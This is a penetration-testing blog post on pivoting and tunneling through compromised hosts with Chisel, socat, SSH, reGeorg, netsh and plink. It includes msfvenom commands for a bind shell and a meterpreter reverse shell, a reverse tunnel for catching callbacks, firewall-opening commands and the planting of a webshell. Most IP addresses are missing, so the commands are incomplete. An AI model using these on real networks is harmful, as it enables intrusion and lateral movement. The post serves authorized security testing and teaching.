Pivoting techniques: Part 2

This post will cover some useful tools and commands for tunneling and pivoting about pen testing.

Riya Jain
4 min readDec 31, 2023

A few examples throughout the post will cover a basic scenario given a set of IP’s with the attacker running Kali Linux — map is shown below.

1) Chisel

A robust OS-agnostic tool to build out simple to complex tunnels. It was built using the client-server model. It's a great option if your target doesn’t have SSH built in.

Launching Chisel Server this example will listen on 5447.

chisel server --host -p 5447 --socks5 --reverse

Launching the Chisle Client in this example will call Kali port 5447 and enable port 2600 for proxy chains on Kali.

./chisle_binary client R:2600:socks

Within your proxychains config on Kali (vim :$) update the ProxyList directive to

socks5 2600

Now when using proxychains, your traffic will be piped through your client.

proxychains wget


A lot you can do with socat. This example will forward traffic between Kali and an internal target by using the intermediary/public-facing target as a proxy.

This payload example will listen on 4991 for incoming connections. This bind shell will be executed as an internal, non-public target.

msfvenom -f exe -p windows/shell_bind_tcp LPORT=4991 -f exe > ib_4991.exe

On the intermediary target, move over and install socat via scp.

scp -r -i ssh-key /tmp/socat.rpm root@
yum install /tmp/socat.rpm

Meow run socat. This will listen on its interface of port 8080, then forward any request hitting 8080 onto the internal target, port 4991.

socat tcp-listen:8080,bind=,fork tcp:

Finally, on Kali use Netcat to connect to socats listening to host: port.

nc -nv 8080

3) SSH Tunnels

If SSH is commonplace in your target environment you can build out SSH tunnels to accomplish your goal without dropping any extra tools. With SSH you can set up dynamic port forwarding, forward specific ports, or use the -J switch to treat targets as jump hosts.

Dynamic port forwarding.

Running this on your Kali machine with proxy chains will proxy traffic through off to additional targets. You’ll need to update your socks port in the proxychains config to 2600, or whatever port of your choosing.

ssh -N -D 2600 root@

Remote Forwarding

Remote forwarding can be used to access internal resources (web servers, DB’s, etc) or catch reverse shells. You’ll need to allow GatewayPorts yes on the intermediate/proxy machine's sshd config for this to work.

Running from your attacking box, this example will SSH to and forward requests going to locahost:8081 onto

ssh -R 8081: root@

So running this command and opening Firefox on Kali, going to http://localhost:8081 will display contents of

The below example will ssh to, listen on port 4444, then forward to localhost on Kali port 4447. This will work to catch a callback from a reverse shell on an internal target.

ssh -R root@

Setting up the reverse shell payload you’ll need to set the LHOST to port 4444, then listen on Kali’s localhost 4447. Example below.

msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT=4444

4) reGeorg

reGeorg functions as sort of a web shell tunnel. A useful tool if you have limited access to your intermediary/public-facing web server or if you want your proxied traffic to blend into normal web traffic. It works as a client-server tool and you’ll need to use proxychains along with it.

The reGeorg client/webshell is written in a few different web languages. Once you drop the client webshell on target, you’ll run the reGeorg python script from your attacking box. This example will have your proxychains config set to port 2600.

python reGeorg.py -p 2600 -u

Now when you use proxychains, your traffic will be tunneled through over port 80.

5) Netsh

Netsh is a built-in Windows CLI binary which amongst other things can be used to port forward. This example will listen on interface on port 5446 and will forward requests hitting 5446 off to port 5985.

netsh interface portproxy add v4tov4 listenport=5446 listenaddress= connectport=5985 connectaddress=

You can also use netsh to open ports on the firewall, which you may need to do when you smash open one of these ports.

netsh advfirewall firewall add rule name=fwd dir=in action=allow proto

6) Plink

Plink.exe is a CLI binary based on putty. It has similar capabilities to other individual binaries discussed. You can use it as a simple SSH command-line client on Windows (if none are built-in). You can also use it to create local or reverse tunnels.

Ran from the internal Windows box ( you will create a reverse tunnel on listening on all interfaces ( port 8181. Then forward anything that hits 8181 onto localhost (aka .21 Windows box) port 80.

.\plink.exe -ssh -l root -pw toor -R



Riya Jain

Security Researcher | Penetration Tester | Red Team | Blue Team | eJPT|CAP | CND | Purple Team